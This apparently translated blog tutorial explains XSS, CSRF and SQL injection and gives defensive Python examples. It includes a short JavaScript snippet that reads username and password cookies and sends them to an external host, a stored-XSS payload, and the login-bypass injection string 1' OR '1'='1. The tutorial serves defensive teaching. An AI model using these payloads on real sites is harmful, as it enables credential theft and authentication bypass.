Web security and protection (XSS, CSRF, sql injection)

XSS attack principle

XSS (cross-site scripting) is an attack in which the attacker inserts malicious HTML tags or JavaScript code into a web page.

For example:
1. The attacker posts a seemingly harmless link in a forum to trick users into clicking it, and steals the private information stored in the user's cookie;
2. Or the attacker adds a malicious form to the forum, so that when a user submits it, the information is sent to the attacker's server instead of the trusted site the user expected.
Consider a page that lets users post messages and displays them to every visitor.
Because the page fully trusts user input, a user with bad intentions can post a message that contains a script tag instead of plain text.

In this way, no matter who visits this page, the browser console will print "Hey you are a fool fish!". That is only a malicious joke, but not everyone is so harmless: some users will use this vulnerability to steal other users' information, trick people into opening malicious websites, or make them download malicious programs. Let us look at the simplest example of using XSS to steal usernames and passwords.
Of course, this example is very simple and almost no real website could be attacked this way; it only illustrates the principle. Many login pages offer to remember the username and password so the user can log in more easily next time, and some websites record the username and password in the cookie in plain text. After logging in to his own account, a malicious user can use a simple tool to look at the cookie structure and learn the field names. If the website has an XSS vulnerability, he can then use a JSONP-style request to obtain the usernames and passwords of other users.

A malicious user would post a message that loads an external script.


Let's see what is hidden in http://test.com/hack.js:

<pre>
// CookieHelper is a helper assumed by the post; it reads a named cookie.
var username = CookieHelper.getCookie('username').value;
var password = CookieHelper.getCookie('password').value;
// Send both values to the attacker's server as a script (JSONP-style) request.
var script = document.createElement('script');
script.src = 'http://test.com/index.php?username=' + username + '&password=' + password;
document.body.appendChild(script);
</pre>

A few lines of JavaScript read the username and password from the cookie and use a JSONP-style script request to send them to http://test.com/index.php.

Harm:

1. Theft of user information, such as machine login accounts, online banking accounts, and all kinds of administrator accounts

2. Control over corporate data, including the ability to read, tamper with, add, and delete sensitive corporate data

3. Theft of commercially valuable company data

4. Illegal money transfers

5. Forced sending of email

6. Control of the victim's machine to launch attacks on other websites

XSS attack prevention method

Firstly, every place where user input enters the code, and every variable derived from it, must be carefully checked for length, and characters such as "<", ">", ";" and "'" must be filtered; secondly, any content must be encoded before it is written to the page, so that it cannot accidentally become an HTML tag. If this layer is done well, at least half of all XSS attacks can be blocked.

Then, avoid placing private user data such as email addresses or passwords directly in cookies.

Next, bind the cookie to the client's IP address to reduce the risk from cookie leakage. A cookie obtained by the attacker then has no practical value and cannot be replayed.

Finally, prefer POST over GET for submitting forms.
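The output-encoding and length-check defence described above, applied to the message board from this post, as an added example (not code from the original post). The payload string is constructed to mirror the post's stored-XSS message; `render_unsafe`, `render_safe` and `contains_tag` are names chosen for this example.

```python
import re

MAX_MESSAGE_LENGTH = 200

# Characters that can change HTML structure, mapped to their entity encodings.
HTML_ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def encode_for_html(text: str) -> str:
    """Encode every HTML-significant character so the text is displayed literally."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in text)


def validate_message(text: str) -> str:
    """Length check on user input; rejects oversized messages."""
    if len(text) > MAX_MESSAGE_LENGTH:
        raise ValueError("message too long")
    return text


def render_unsafe(message: str) -> str:
    """Vulnerable version: trusts the input and writes it straight into the page."""
    return f"<li>{message}</li>"


def render_safe(message: str) -> str:
    """Fixed version: validate, then encode before writing to the page."""
    return f"<li>{encode_for_html(validate_message(message))}</li>"


def contains_tag(html_fragment: str, tag: str = "script") -> bool:
    """Detection helper: does the rendered fragment still contain a live <tag ...>?"""
    return re.search(rf"<\s*{tag}\b", html_fragment, re.IGNORECASE) is not None


# Constructed payload mirroring the post's malicious message (not a real host).
PAYLOAD = '<script src="http://test.com/hack.js"></script>'

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))  # the script tag is live in the page
    print(render_safe(PAYLOAD))    # shown as text; no tag is created
```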

Difference between XSS and CSRF (cross-site request forgery)

XSS obtains information without needing to know the code or request format of other users' pages in advance. CSRF performs a specified action on behalf of the user, and therefore needs to know the code and request format of the target pages.

To complete a CSRF attack, the victim must carry out two steps in sequence:

1. Log in to trusted website A, so that a cookie is generated and stored locally.

2. Visit the dangerous website B without having logged out of A.

CSRF attack

Principle:
CSRF (Cross Site Request Forgery), or cross-site request forgery, is a common web attack. The victim logs on to website A, enters personal information, and the browser stores the cookie generated by A's server. While still logged in, the user clicks a malicious link constructed by the attacker and is taken to website B, which issues a request to A; the browser attaches the user's cookie for A to that request. Website A is thus given the false impression that the user made the request himself and carries out a series of operations, the most common being a money transfer.

Example:
1. A user, Bob, is browsing a chat forum where another user, Alice, has just posted a message containing an image whose link points to Bob's bank. Suppose Alice has constructed a link that submits a withdrawal form on Bob's bank site and has used this link as the image's src. If Bob's bank keeps his authorization in a cookie that has not yet expired, then when Bob's browser tries to load the image it will submit the withdrawal form together with his cookie, and the transaction is authorized without Bob's consent.

Harm:
A web application that performs actions based on trusted input forms and authenticated users, without requiring separate authorization for those actions, is exposed. A user already authenticated by the cookie stored in his browser can be made to send an HTTP request to the site that trusts him without realizing it, so that actions the user never intended are performed.

Prevention:

1. Verification code (CAPTCHA).
During the interaction between the application and the user, especially at the core step of an account transaction, the user is forced to enter a verification code to complete the final request. In normal circumstances a verification code is good enough to deter CSRF attacks. But adding one degrades the user experience, and a website cannot add verification codes to every operation. The verification code can therefore only serve as an auxiliary measure, applied at key business points.

2. Anti-CSRF token.
The more complete solution in current use is to add an Anti-CSRF-Token: a randomly generated token is added as a parameter to the HTTP request when it is sent, and an interceptor on the server verifies it. The server reads the token value from the cookie of the browser's current domain and checks that the token in the request and the token value in the cookie both exist and are equal; only then does it consider the request legitimate.
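The token check described above, implemented as a double-submit cookie, as an added example (not code from the original post). The function names, the `csrf_token` cookie and field names, and the transfer form fields are assumptions of this example.

```python
import hmac
import secrets

TOKEN_COOKIE = "csrf_token"   # assumed cookie name
TOKEN_FIELD = "csrf_token"    # assumed hidden form field name


def issue_token() -> str:
    """Random token the server sets in a cookie and embeds in its own forms."""
    return secrets.token_urlsafe(32)


def is_legitimate_request(cookies: dict, form: dict) -> bool:
    """Accept only if the token exists in both places and the two values match."""
    cookie_token = cookies.get(TOKEN_COOKIE)
    form_token = form.get(TOKEN_FIELD)
    if not cookie_token or not form_token:
        return False
    # Constant-time comparison so the token is not leaked through timing.
    return hmac.compare_digest(cookie_token, form_token)


def build_transfer_form(token: str, to_account: str, amount: str) -> dict:
    """What site A's own page submits: the business fields plus the hidden token."""
    return {"to": to_account, "amount": amount, TOKEN_FIELD: token}


def forged_transfer_form(to_account: str, amount: str) -> dict:
    """What site B can forge: the browser still attaches the cookie, but B cannot
    read the cookie's value, so it cannot supply a matching form field."""
    return {"to": to_account, "amount": amount}


def demo() -> tuple:
    """Returns (genuine accepted?, forged accepted?, guessed token accepted?)."""
    token = issue_token()
    # Constructed browser cookie jar for site A.
    cookies = {"session": "constructed-session-id", TOKEN_COOKIE: token}
    genuine = is_legitimate_request(cookies, build_transfer_form(token, "bob", "100"))
    forged = is_legitimate_request(cookies, forged_transfer_form("attacker", "100"))
    guessed = is_legitimate_request(
        cookies, build_transfer_form(issue_token(), "attacker", "100"))
    return genuine, forged, guessed
```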

CSRF defense

There are many server-side methods of defending against CSRF, but the general idea is the same: add a pseudo-random token to the client page.

How to pass the verification code

SQL injection attack

Principle:
SQL injection: when the application passes SQL (Structured Query Language) to the back-end database, the attacker inserts SQL commands into a web form submission, or into the query string of a domain name or page request, and finally tricks the server into executing malicious SQL commands.

Example:
The SQL query used for login verification on a certain website is:

strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '" + passWord + "');"

When the fields are maliciously filled in as
userName = "1' OR '1'='1";
and
passWord = "1' OR '1'='1";
the original SQL string becomes
strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
that is, the SQL command actually executed is equivalent to
strSQL = "SELECT * FROM users;"

Therefore one can log in to the website without an account or password. This is why SQL injection attacks are commonly known as the hackers' fill-in-the-blank game.

Harm:
Obtaining administrator privileges

Prevention:

1. Add blacklist or whitelist validation
Whitelist validation generally means checking whether the user input meets the expected type, length, value range or other format requirements. Blacklist validation means rejecting the request if the user input contains obviously malicious content. Whitelist validation is usually combined with blacklist validation.

2. Security inspection
After the project is completed, always insist on a security inspection.

3. Prevent leakage of sensitive system information
Strictly control access rights to data tables, and limit unnecessary user privileges as far as possible.

Summary:

The principle of SQL injection
is to insert SQL commands into a web form submission, or into the query string of a domain name or page request, so as to trick the server into executing malicious SQL commands.

SQL injection prevention

1. Never trust the user's input. Validate it, for example with regular expressions or length limits, and escape single quotes and double hyphens ("--").

2. Never assemble SQL dynamically; use parameterized SQL or stored procedures for data access.

3. Never use an administrator's database connection; give each application its own database connection with limited privileges.

4. Do not store confidential information in plaintext; encrypt or hash passwords and other sensitive information.
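The login query from the SQL injection section, run against an in-memory SQLite table first with string concatenation and then with the parameterized SQL recommended in point 2, as an added example (not code from the original post). The table contents and the `login_concat` / `login_param` names are constructed for this example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("admin", "hunter2")])
    return conn


def login_concat(conn: sqlite3.Connection, user_name: str, pass_word: str) -> list:
    """Vulnerable: builds strSQL by concatenation, exactly as the post shows."""
    str_sql = ("SELECT * FROM users WHERE (name = '" + user_name +
               "') and (pw = '" + pass_word + "');")
    return conn.execute(str_sql).fetchall()


def login_param(conn: sqlite3.Connection, user_name: str, pass_word: str) -> list:
    """Fixed: the driver binds the values, so quotes in the input remain data."""
    str_sql = "SELECT * FROM users WHERE (name = ?) and (pw = ?);"
    return conn.execute(str_sql, (user_name, pass_word)).fetchall()


# The input from the post's example.
INJECTION = "1' OR '1'='1"


def demo() -> tuple:
    """Returns (rows via concatenation, rows via parameters, rows for a real login)."""
    conn = make_db()
    # Concatenation: the WHERE clause is always true, so every user row comes back.
    rows_concat = login_concat(conn, INJECTION, INJECTION)
    # Parameterized: no user is literally named "1' OR '1'='1", so nothing matches.
    rows_param = login_param(conn, INJECTION, INJECTION)
    # Parameterized queries still work for a genuine login.
    rows_valid = login_param(conn, "alice", "s3cret")
    return len(rows_concat), len(rows_param), len(rows_valid)


if __name__ == "__main__":
    print(demo())  # (2, 0, 1)
```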

XSS
XSS (cross-site scripting) is an attack in which the attacker inserts malicious HTML tags or JavaScript code into a web page.

CSRF

CSRF (Cross Site Request Forgery), or cross-site request forgery, is a common web attack. The victim logs on to website A, enters personal information, and the browser stores the cookie generated by A's server. While still logged in, the user clicks a malicious link constructed by the attacker and is taken to website B, which makes a request to A that the browser sends together with the user's cookie for A.



Source: blog.csdn.net/weixin_43638968/article/details/109292659